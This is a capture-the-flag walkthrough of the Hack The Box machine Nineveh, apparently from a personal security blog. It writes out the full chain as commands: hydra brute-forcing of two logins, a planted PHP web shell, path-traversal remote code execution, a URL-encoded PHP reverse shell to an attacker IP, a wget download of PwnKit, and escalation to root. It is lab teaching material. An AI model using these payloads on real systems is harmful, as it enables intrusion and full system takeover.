NitheshD05 | Cyber Realm

Search

SearchSearch

Nineveh

Apr 16, 20263 min read

HTB Profile Image

Ping

ping 10.10.10.43

Nmap Default Scan

nmap 10.10.10.43 -oN dnmap

Nmap Script and Service Scan

nmap 10.10.10.43 -sC -sV -A -oN snmap

Nmap All Port Scan

nmap 10.10.10.43 -p- --open -T5 -oN anmap

On port 443 https://10.10.10.43

On Port 80 http://10.10.10.43

Gobuster Scan

gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt

http://10.10.10.43/department

Source page So we can assume the mysql is installed on server and there is a user named amrois

Will try to do sql injection using the gathered information But sql didn’t work

Tried brute force with user amrois, no luck

Will try brute force with user admin Captured login form

Brute force using hydra’s http post form

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form '/department/login.php:username=^USER^&password=^PASS^:Invalid Password!'

Found valid creds admin:1q2w3e4r5t

Successfully logged in as Admin

Notes

After some enumeration, I can’t progress further

Will Enumerate port 443

gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster443.txt

https://10.10.10.43/db We can see phpLiteAdmin version, will search for any public exploit.

Found one https://www.exploit-db.com/exploits/24044

Before that we need to find password to login, will use hydra this time for https-post-form

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.'

Logged in as admin

Now will follow the steps in the exploit https://www.exploit-db.com/exploits/24044

Following the steps Created the database named hack.php and table named pwn and the filed 1

Now have to insert malicious php code to get RCE

<?php echo system($_REQUEST ["cmd"]); ?>
<?php echo system($_REQUEST ["cmd"]); ?>

We can RCE Now

 http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=id

Will get reverse shell, using php reverse shell with url enconding

10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.6%22%2C4444%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

Got reverse shell and upgraded my shell using python

rlwrap nc -nvlp 4444

python3 -c 'import pty; pty.spawn("/bin/bash")'

Can’t read user.txt

Will jump to Privilege Escalation…!

We can’t see our sudo permissions, it is asking password

Will check for SUID binaries

find / -perm -u=s -type f 2>/dev/null

We can se pkexec, will check its version

pkexec --version

Running vulnerable Version, will try PwnKit

Transferring PwnKit to target machine

wget 10.10.14.6/PwnKit

Change permissions and execute the binary

chmod +x PwnKit

./PwnKit

Coool..! We ARe Ro0t

root.txt

User.txt

Done with Nineveh…:)

Backlinks

Graph View